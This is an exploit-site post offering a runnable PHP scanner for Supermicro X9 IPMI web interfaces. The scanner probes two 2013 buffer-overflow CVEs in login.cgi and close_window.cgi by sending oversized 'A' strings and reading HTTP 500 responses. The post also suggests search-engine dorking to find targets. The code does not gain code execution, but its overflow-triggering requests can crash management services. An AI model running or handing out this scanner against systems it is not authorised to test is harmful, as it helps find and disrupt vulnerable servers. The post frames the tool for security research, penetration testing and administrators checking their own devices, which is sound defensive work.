## https://sploitus.com/exploit?id=PACKETSTORM:189593
=============================================================================================================================================
| # Title : Supermicro X9 generation motherboards before SMT X9 317 PHP Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.supermicro.com |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: This code is a Vulnerability Scanner designed to scan for vulnerabilities in the Supermicro Onboard IPMI interface. The code checks for two known vulnerabilities in Supermicro IPMI systems:
CVE-2013-3621 - Buffer Overflow in login.cgi The code sends a normal-sized login, then sends a much larger data.
If the server responds with a 500 (Internal Server Error) when sending the large data, the system is vulnerable.
CVE-2013-3623 - Buffer Overflow in close_window.cgi Sends a request to close_window.cgi using normal data, then sends a very large data.
If the server responds with a 500 when sending the large data, the system is vulnerable.
How does the code work?
Verifies that the target site is a Supermicro IPMI by checking the text on the home page (isSupermicro).
Checks the login.cgi vulnerability by sending random login data (checkLogin).
Checks the close_window.cgi vulnerability by sending session data (checkCloseWindow).
Displays the results: If the target is vulnerable, a warning message will be printed.
What is this code for?
Helps security researchers discover systems vulnerable to these vulnerabilities.
Can be used in penetration testing to verify the security of Supermicro IPMI devices.
Administrators can use it to verify that their systems are not vulnerable to these vulnerabilities.
( Related : https://packetstorm.news/files/id/181154/ Related CVE Numbers: CVE-2013-3621, CVE-2013-3623 )
[+] save code as poc.php.
[+] Set Target : line 92
[+] USage : php poc.php
[+] PayLoad :
<?php
class SupermicroIPMIScanner {
private $target;
public function __construct($target) {
$this->target = $target;
}
private function sendRequest($uri, $method = 'GET', $postData = []) {
$url = "http://{$this->target}{$uri}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
}
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ['body' => $response, 'code' => $httpCode];
}
private function isSupermicro() {
$res = $this->sendRequest("/");
return ($res['code'] === 200 && strpos($res['body'], "ATEN International Co Ltd.") !== false);
}
private function sendCloseWindowRequest($session) {
return $this->sendRequest("/cgi/close_window.cgi", 'POST', ['sess_sid' => $session]);
}
private function checkCloseWindow() {
$safeCheck = str_repeat('A', 20);
$triggerCheck = str_repeat('A', 132);
$res = $this->sendCloseWindowRequest($safeCheck);
if (!$res || $res['code'] !== 200 || strpos($res['body'], "Can't find action") === false) {
return false;
}
$res = $this->sendCloseWindowRequest($triggerCheck);
return ($res && $res['code'] === 500);
}
private function sendLoginRequest($name) {
return $this->sendRequest("/cgi/login.cgi", 'POST', [
'name' => $name,
'pwd' => str_repeat('A', 4)
]);
}
private function checkLogin() {
$safeCheck = str_repeat('A', 20);
$triggerCheck = str_repeat('A', 300);
$res = $this->sendLoginRequest($safeCheck);
if (!$res || $res['code'] !== 200 || strpos($res['body'], "ATEN International Co Ltd.") === false || strpos($res['body'], "top.location.href = location.href") === false) {
return false;
}
$res = $this->sendLoginRequest($triggerCheck);
return ($res && $res['code'] === 500);
}
public function runScan() {
echo "Checking if it's a Supermicro IPMI web interface...\n";
if ($this->isSupermicro()) {
echo "Supermicro IPMI web interface found\n";
} else {
echo "Supermicro IPMI web interface not found\n";
return;
}
echo "Checking CVE-2013-3621 (login.cgi Buffer Overflow)...\n";
if ($this->checkLogin()) {
echo "Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)\n";
}
echo "Checking CVE-2013-3623 (close_window.cgi Buffer Overflow)...\n";
if ($this->checkCloseWindow()) {
echo "Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)\n";
}
}
}
$scanner = new SupermicroIPMIScanner('192.168.1.1'); // استبدل بعنوان الهدف
$scanner->runScan();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================